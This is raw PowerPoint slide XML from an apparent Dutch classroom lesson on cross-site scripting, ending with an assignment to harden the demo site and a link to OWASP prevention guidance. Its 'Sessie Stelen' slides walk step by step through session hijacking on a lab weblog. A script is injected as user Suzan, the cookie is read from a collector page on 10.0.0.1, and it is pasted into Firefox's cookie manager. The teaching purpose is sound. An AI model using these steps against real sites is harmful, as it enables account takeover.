              <a:t>en bekijk het resultaat.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>als er al iets te zien is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840584" y="3756188"/>
            <a:ext cx="3083977" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Wat doet bovenstaand script precies?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Afbeelding 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574776" y="3345853"/>
            <a:ext cx="3963924" cy="2113331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Ovaal 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089679" y="3334435"/>
            <a:ext cx="914400" cy="421753"/>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691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5.Sessie Stelen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Sessie Stelen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Stap3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Start een andere(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suzan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)  in IE en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Wat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>een</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>leuke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> site is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>!!!!!!!!</a:t>
            </a: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p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>als er al iets te zien is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840584" y="3756188"/>
            <a:ext cx="3083977" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Wat doet bovenstaand script precies?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 4" descr="Afbeeldingsresultaat voor office computer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742989" y="1005840"/>
            <a:ext cx="1316392" cy="1324786"/>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2928578" y="3020556"/>
            <a:ext cx="4748363" cy="2329143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Ovaal 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688947" y="3018660"/>
            <a:ext cx="914400" cy="421753"/>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181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54817"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5.Sessie Stelen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Sessie Stelen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19" y="1991360"/>
            <a:ext cx="11494977" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Start een tweede tabblad in Firefox en open:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>http://10.0.0.1/sessionsteal/pdo_shows.php</a:t>
            </a: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Stap6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Kopieer het laatste cookie mochten er meer in staan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Geef de hacker-sessie naar het weblog de focus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>klik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookies-manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edit</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : plak het eerder gekopieerde cookie in het veld inhoud-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sluiten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>........(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wie ben je nu?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</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5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2272496" y="3187363"/>
            <a:ext cx="5223573" cy="1137649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Ovaal 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3788229" y="3478348"/>
            <a:ext cx="3627454" cy="75200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41625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400" dirty="0" smtClean="0"/>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testopstelling maken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Onschuldige "spielerei"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>klieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Misleiding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS voorkomen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht</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679602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XSS injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>voorkomen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor inhoud 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688937" y="1747269"/>
            <a:ext cx="8136880" cy="4590034"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" err="1"/>
              <a:t>Sanatize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>de  invoer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>check op HTML en vooral op javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Het is in feite niet eenvoudig om dit te voorkomen. Het vereist wat onderzoek in de gangbare methoden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" b="0" dirty="0"/>
              <a:t>zie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1400" b="0" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Tijdelijke aanduiding voor inhoud 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>voorkomen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Afbeelding 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189244" y="2159349"/>
            <a:ext cx="3352800" cy="3162300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Afbeelding 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2739194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rgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="762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5205045" y="1096894"/>
            <a:ext cx="6712299" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht: voorkom XSS</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Opdracht</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Omschrijving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Neem maatregelen om de testwebsite zoals tijdens de demo's is gebruikt, XSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> te maken. Het hoeft niet heel sophisticated, maar probeer een paar maatregelen te nemen dat XSS niet meer zo makkelijk mogelijk maakt. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" smtClean="0"/>
              <a:t>maak eventueel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>gebruik van Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test of de maatregelen werken. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                         </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4027318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Nawoord</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor inhoud 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Profiel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>zal, op voorgaande onderwerpen  aansluitend, dieper in gaan op </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>zgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>en hoe je een site daartegen kunt wapenen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Profiel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ISM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0"/>
              <a:t> Security en Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>) gaat dieper in op alle facetten van security o.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>dmv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> actief hacken.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Tijdelijke aanduiding voor inhoud 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Tijdelijke aanduiding voor inhoud 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>nawoord</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Tijdelijke aanduiding voor inhoud 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Afbeelding 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
